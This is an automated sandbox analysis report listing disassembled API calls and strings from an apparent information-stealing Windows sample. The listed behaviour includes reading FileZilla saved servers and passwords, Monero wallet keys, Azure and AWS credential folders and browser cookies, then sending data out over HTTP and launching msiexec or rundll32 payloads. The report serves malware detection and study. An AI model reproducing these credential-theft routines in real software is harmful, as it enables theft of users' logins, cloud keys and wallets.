• Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004D8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004D8F9B
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                                • Part of subcall function 004CA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004CA13C
                                • Part of subcall function 004CA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004CA161
                                • Part of subcall function 004CA110: LocalAlloc.KERNEL32(00000040,?), ref: 004CA181
                                • Part of subcall function 004CA110: ReadFile.KERNEL32(000000FF,?,00000000,004C148F,00000000), ref: 004CA1AA
                                • Part of subcall function 004CA110: LocalFree.KERNEL32(004C148F), ref: 004CA1E0
                                • Part of subcall function 004CA110: CloseHandle.KERNEL32(000000FF), ref: 004CA1EA
                                • Part of subcall function 004D8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004D8FE2
                              • GetProcessHeap.KERNEL32(00000000,000F423F,004E0DBF,004E0DBE,004E0DBB,004E0DBA), ref: 004D04C2
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004D04C9
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 004D04E5
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004E0DB7), ref: 004D04F3
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 004D052F
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004E0DB7), ref: 004D053D
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 004D0579
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004E0DB7), ref: 004D0587
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 004D05C3
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004E0DB7), ref: 004D05D5
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004E0DB7), ref: 004D0662
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004E0DB7), ref: 004D067A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004E0DB7), ref: 004D0692
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004E0DB7), ref: 004D06AA
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 004D06C2
                              • lstrcat.KERNEL32(?,profile: null), ref: 004D06D1
                              • lstrcat.KERNEL32(?,url: ), ref: 004D06E0
                              • lstrcat.KERNEL32(?,00000000), ref: 004D06F3
                              • lstrcat.KERNEL32(?,004E1770), ref: 004D0702
                              • lstrcat.KERNEL32(?,00000000), ref: 004D0715
                              • lstrcat.KERNEL32(?,004E1774), ref: 004D0724
                              • lstrcat.KERNEL32(?,login: ), ref: 004D0733
                              • lstrcat.KERNEL32(?,00000000), ref: 004D0746
                              • lstrcat.KERNEL32(?,004E1780), ref: 004D0755
                              • lstrcat.KERNEL32(?,password: ), ref: 004D0764
                              • lstrcat.KERNEL32(?,00000000), ref: 004D0777
                              • lstrcat.KERNEL32(?,004E1790), ref: 004D0786
                              • lstrcat.KERNEL32(?,004E1794), ref: 004D0795
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004E0DB7), ref: 004D07EE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 763e65dabe75c0a2b851c54bbec62cf2a822aedae1b53c99afd18019d0b63d69
                              • Instruction ID: f09cd81198598c6974120fbb186b46d6d929c425ca7add90c740dd032b0dd91a
                              • Opcode Fuzzy Hash: 763e65dabe75c0a2b851c54bbec62cf2a822aedae1b53c99afd18019d0b63d69
                              • Instruction Fuzzy Hash: 4AD18171910108ABCB04EBE1DDAAEEE7339AF14705F10855FF102672A5DF38BA55CB29
                              APIs
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                                • Part of subcall function 004C4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004C4889
                                • Part of subcall function 004C4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 004C4899
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004C5A48
                              • StrCmpCA.SHLWAPI(?,012AE8D8), ref: 004C5A63
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004C5BE3
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,012AE8C8,00000000,?,012AA570,00000000,?,004E1B4C), ref: 004C5EC1
                              • lstrlen.KERNEL32(00000000), ref: 004C5ED2
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 004C5EE3
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C5EEA
                              • lstrlen.KERNEL32(00000000), ref: 004C5EFF
                              • lstrlen.KERNEL32(00000000), ref: 004C5F28
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 004C5F41
                              • lstrlen.KERNEL32(00000000,?,?), ref: 004C5F6B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004C5F7F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004C5F9C
                              • InternetCloseHandle.WININET(00000000), ref: 004C6000
                              • InternetCloseHandle.WININET(00000000), ref: 004C600D
                              • HttpOpenRequestA.WININET(00000000,012AE778,?,012AE0E0,00000000,00000000,00400100,00000000), ref: 004C5C48
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                              • InternetCloseHandle.WININET(00000000), ref: 004C6017
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: b376decbe9558025b8aa081fc6fe64cfd59b087414a0986e673ee6ba0a5b973c
                              • Instruction ID: 19958c5cc161a1bbc88f34c370ecc8b1114337b98bc916f519d4fddb8cb82fdf
                              • Opcode Fuzzy Hash: b376decbe9558025b8aa081fc6fe64cfd59b087414a0986e673ee6ba0a5b973c
                              • Instruction Fuzzy Hash: 5B12EB71920118ABCB15EBA1DCA5FEEB379BF14704F00419FB10662291EF783B59CB69
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                                • Part of subcall function 004D8CF0: GetSystemTime.KERNEL32(004E0E1B,012AA480,004E05B6,?,?,004C13F9,?,0000001A,004E0E1B,00000000,?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004D8D16
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004CD083
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004CD1C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004CD1CE
                              • lstrcat.KERNEL32(?,00000000), ref: 004CD308
                              • lstrcat.KERNEL32(?,004E1570), ref: 004CD317
                              • lstrcat.KERNEL32(?,00000000), ref: 004CD32A
                              • lstrcat.KERNEL32(?,004E1574), ref: 004CD339
                              • lstrcat.KERNEL32(?,00000000), ref: 004CD34C
                              • lstrcat.KERNEL32(?,004E1578), ref: 004CD35B
                              • lstrcat.KERNEL32(?,00000000), ref: 004CD36E
                              • lstrcat.KERNEL32(?,004E157C), ref: 004CD37D
                              • lstrcat.KERNEL32(?,00000000), ref: 004CD390
                              • lstrcat.KERNEL32(?,004E1580), ref: 004CD39F
                              • lstrcat.KERNEL32(?,00000000), ref: 004CD3B2
                              • lstrcat.KERNEL32(?,004E1584), ref: 004CD3C1
                              • lstrcat.KERNEL32(?,00000000), ref: 004CD3D4
                              • lstrcat.KERNEL32(?,004E1588), ref: 004CD3E3
                                • Part of subcall function 004DAB30: lstrlen.KERNEL32(004C4F55,?,?,004C4F55,004E0DDF), ref: 004DAB3B
                                • Part of subcall function 004DAB30: lstrcpy.KERNEL32(004E0DDF,00000000), ref: 004DAB95
                              • lstrlen.KERNEL32(?), ref: 004CD42A
                              • lstrlen.KERNEL32(?), ref: 004CD439
                                • Part of subcall function 004DAD80: StrCmpCA.SHLWAPI(00000000,004E1568,004CD2A2,004E1568,00000000), ref: 004DAD9F
                              • DeleteFileA.KERNEL32(00000000), ref: 004CD4B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: dc339b826942fbfbd29c588c3811503035e12f261adcf5f3b90d86fcaffde684
                              • Instruction ID: 98dcc25c8f42026a71754b2419e1e24625a6b7f027acd7ae7bca4301c9945514
                              • Opcode Fuzzy Hash: dc339b826942fbfbd29c588c3811503035e12f261adcf5f3b90d86fcaffde684
                              • Instruction Fuzzy Hash: CCE17571920104ABCB08EBA1DD66EEE7379BF14305F10455FF106762A1DE38BA19CB6D
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,012ACF90,00000000,?,004E1544,00000000,?,?), ref: 004CCB6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 004CCB89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 004CCB95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004CCBA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 004CCBD9
                              • StrStrA.SHLWAPI(?,012ACFD8,004E0B56), ref: 004CCBF7
                              • StrStrA.SHLWAPI(00000000,012ACFF0), ref: 004CCC1E
                              • StrStrA.SHLWAPI(?,012ADD60,00000000,?,004E1550,00000000,?,00000000,00000000,?,012A9248,00000000,?,004E154C,00000000,?), ref: 004CCDA2
                              • StrStrA.SHLWAPI(00000000,012ADC40), ref: 004CCDB9
                                • Part of subcall function 004CC920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 004CC971
                                • Part of subcall function 004CC920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 004CC97C
                              • StrStrA.SHLWAPI(?,012ADC40,00000000,?,004E1554,00000000,?,00000000,012A91D8), ref: 004CCE5A
                              • StrStrA.SHLWAPI(00000000,012A8FA8), ref: 004CCE71
                                • Part of subcall function 004CC920: lstrcat.KERNEL32(?,004E0B47), ref: 004CCA43
                                • Part of subcall function 004CC920: lstrcat.KERNEL32(?,004E0B4B), ref: 004CCA57
                                • Part of subcall function 004CC920: lstrcat.KERNEL32(?,004E0B4E), ref: 004CCA78
                              • lstrlen.KERNEL32(00000000), ref: 004CCF44
                              • CloseHandle.KERNEL32(00000000), ref: 004CCF9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 8de3e5700acf6bd604c26b3830d7cb842ae4f968fce8cbd261e854de8c56ab82
                              • Instruction ID: cf0a808ed7dc06148661c83b2c8877c8a26cdfebf167daa914157657a296f977
                              • Opcode Fuzzy Hash: 8de3e5700acf6bd604c26b3830d7cb842ae4f968fce8cbd261e854de8c56ab82
                              • Instruction Fuzzy Hash: 06E12F71910108ABCB04EBA5DCA5FEEB779AF54304F00415FF14663291EF387A5ACB69
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              • RegOpenKeyExA.ADVAPI32(00000000,012AB008,00000000,00020019,00000000,004E05BE), ref: 004D8534
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004D85B6
                              • wsprintfA.USER32 ref: 004D85E9
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 004D860B
                              • RegCloseKey.ADVAPI32(00000000), ref: 004D861C
                              • RegCloseKey.ADVAPI32(00000000), ref: 004D8629
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: 33091f8ce33aeb6c4faf9d7896a6867311871432357b655e87df41e808b5d9b3
                              • Instruction ID: 68d11b89ee5f7bf598824392c86abd0e863765ad68658c4564e2c57840288540
                              • Opcode Fuzzy Hash: 33091f8ce33aeb6c4faf9d7896a6867311871432357b655e87df41e808b5d9b3
                              • Instruction Fuzzy Hash: CE810F71910118ABDB28DB54CDA5FEA77B8BF48704F1082DBE10966240DF786B85CFA8
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004D91FC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: `dMF$`dMF$image/jpeg
                              • API String ID: 2244384528-344610199
                              • Opcode ID: 9e254eeca007167ba37f0f01a3bfd40cfe2bd320f60638097c4712ec957f719b
                              • Instruction ID: 88dc0c8deeb1131d7c4a26eb8ea41f69c7f8d04a937815c030814c06d7a45bb9
                              • Opcode Fuzzy Hash: 9e254eeca007167ba37f0f01a3bfd40cfe2bd320f60638097c4712ec957f719b
                              • Instruction Fuzzy Hash: 9071CB75A14208ABDB14DFE4DC99FEEB7B8BB48700F10850AF516A7290DB38E905CB64
                              APIs
                                • Part of subcall function 004D8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004D8F9B
                              • lstrcat.KERNEL32(?,00000000), ref: 004D5000
                              • lstrcat.KERNEL32(?,\.azure\), ref: 004D501D
                                • Part of subcall function 004D4B60: wsprintfA.USER32 ref: 004D4B7C
                                • Part of subcall function 004D4B60: FindFirstFileA.KERNEL32(?,?), ref: 004D4B93
                              • lstrcat.KERNEL32(?,00000000), ref: 004D508C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 004D50A9
                                • Part of subcall function 004D4B60: StrCmpCA.SHLWAPI(?,004E0FC4), ref: 004D4BC1
                                • Part of subcall function 004D4B60: StrCmpCA.SHLWAPI(?,004E0FC8), ref: 004D4BD7
                                • Part of subcall function 004D4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 004D4DCD
                                • Part of subcall function 004D4B60: FindClose.KERNEL32(000000FF), ref: 004D4DE2
                              • lstrcat.KERNEL32(?,00000000), ref: 004D5118
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 004D5135
                                • Part of subcall function 004D4B60: wsprintfA.USER32 ref: 004D4C00
                                • Part of subcall function 004D4B60: StrCmpCA.SHLWAPI(?,004E08D3), ref: 004D4C15
                                • Part of subcall function 004D4B60: wsprintfA.USER32 ref: 004D4C32
                                • Part of subcall function 004D4B60: PathMatchSpecA.SHLWAPI(?,?), ref: 004D4C6E
                                • Part of subcall function 004D4B60: lstrcat.KERNEL32(?,012AE7A8), ref: 004D4C9A
                                • Part of subcall function 004D4B60: lstrcat.KERNEL32(?,004E0FE0), ref: 004D4CAC
                                • Part of subcall function 004D4B60: lstrcat.KERNEL32(?,?), ref: 004D4CC0
                                • Part of subcall function 004D4B60: lstrcat.KERNEL32(?,004E0FE4), ref: 004D4CD2
                                • Part of subcall function 004D4B60: lstrcat.KERNEL32(?,?), ref: 004D4CE6
                                • Part of subcall function 004D4B60: CopyFileA.KERNEL32(?,?,00000001), ref: 004D4CFC
                                • Part of subcall function 004D4B60: DeleteFileA.KERNEL32(?), ref: 004D4D81
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 7b7e930c5500e2844eb3d2d168c7fda4dbca7a1d83f77eaa40397df158d46702
                              • Instruction ID: 38427725c45d62d72a40cc88b64cbdefb406a0fdf149f0c42bc2d3612097cc11
                              • Opcode Fuzzy Hash: 7b7e930c5500e2844eb3d2d168c7fda4dbca7a1d83f77eaa40397df158d46702
                              • Instruction Fuzzy Hash: 2E41147AA5020867DB50E771DC57FED33385B60709F00445BB289661C1EEFCA7C88B9A
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              • ShellExecuteEx.SHELL32(0000003C), ref: 004D3415
                              • ShellExecuteEx.SHELL32(0000003C), ref: 004D35AD
                              • ShellExecuteEx.SHELL32(0000003C), ref: 004D373A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 3348a283c0d6717ac68fda4c9c9d7465db7b03cdedf053db44fdc110488aa000
                              • Instruction ID: c92fdb3a0e249ccd6ffeede7b7f053898dfb58c4626286a3a35317c68eeba205
                              • Opcode Fuzzy Hash: 3348a283c0d6717ac68fda4c9c9d7465db7b03cdedf053db44fdc110488aa000
                              • Instruction Fuzzy Hash: D71251719101089ACB14EBA1DDB6FEDB379AF14304F00419FF10666295EF782B5ACF6A
                              APIs
                                • Part of subcall function 004C9A50: InternetOpenA.WININET(004E0AF6,00000001,00000000,00000000,00000000), ref: 004C9A6A
                              • lstrcat.KERNEL32(?,cookies), ref: 004C9CAF
                              • lstrcat.KERNEL32(?,004E12C4), ref: 004C9CC1
                              • lstrcat.KERNEL32(?,?), ref: 004C9CD5
                              • lstrcat.KERNEL32(?,004E12C8), ref: 004C9CE7
                              • lstrcat.KERNEL32(?,?), ref: 004C9CFB
                              • lstrcat.KERNEL32(?,.txt), ref: 004C9D0D
                              • lstrlen.KERNEL32(00000000), ref: 004C9D17
                              • lstrlen.KERNEL32(00000000), ref: 004C9D26
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Similarity
                              • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                              • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                              • API String ID: 3174675846-3542011879
                              • Opcode ID: 89334d7e4a0fdc27f8bd82c160186ff182e72f3d8d2c61d76b09d7db675f2056
                              • Instruction ID: 3db5ff8540544e3b336f5ca22adb5a133b9a511d394a4398e9d92a0d953d76b9
                              • Opcode Fuzzy Hash: 89334d7e4a0fdc27f8bd82c160186ff182e72f3d8d2c61d76b09d7db675f2056
                              • Instruction Fuzzy Hash: A851B475910508ABCB14EBE1DC55FEE7338AF14305F40819EF206A7190EF78AA49CF69
                              APIs
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                                • Part of subcall function 004C62D0: InternetOpenA.WININET(004E0DFF,00000001,00000000,00000000,00000000), ref: 004C6331
                                • Part of subcall function 004C62D0: StrCmpCA.SHLWAPI(?,012AE8D8), ref: 004C6353
                                • Part of subcall function 004C62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004C6385
                                • Part of subcall function 004C62D0: HttpOpenRequestA.WININET(00000000,GET,?,012AE0E0,00000000,00000000,00400100,00000000), ref: 004C63D5
                                • Part of subcall function 004C62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004C640F
                                • Part of subcall function 004C62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004C6421
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004D5568
                              • lstrlen.KERNEL32(00000000), ref: 004D557F
                                • Part of subcall function 004D8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004D8FE2
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 004D55B4
                              • lstrlen.KERNEL32(00000000), ref: 004D55D3
                              • lstrlen.KERNEL32(00000000), ref: 004D55FE
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
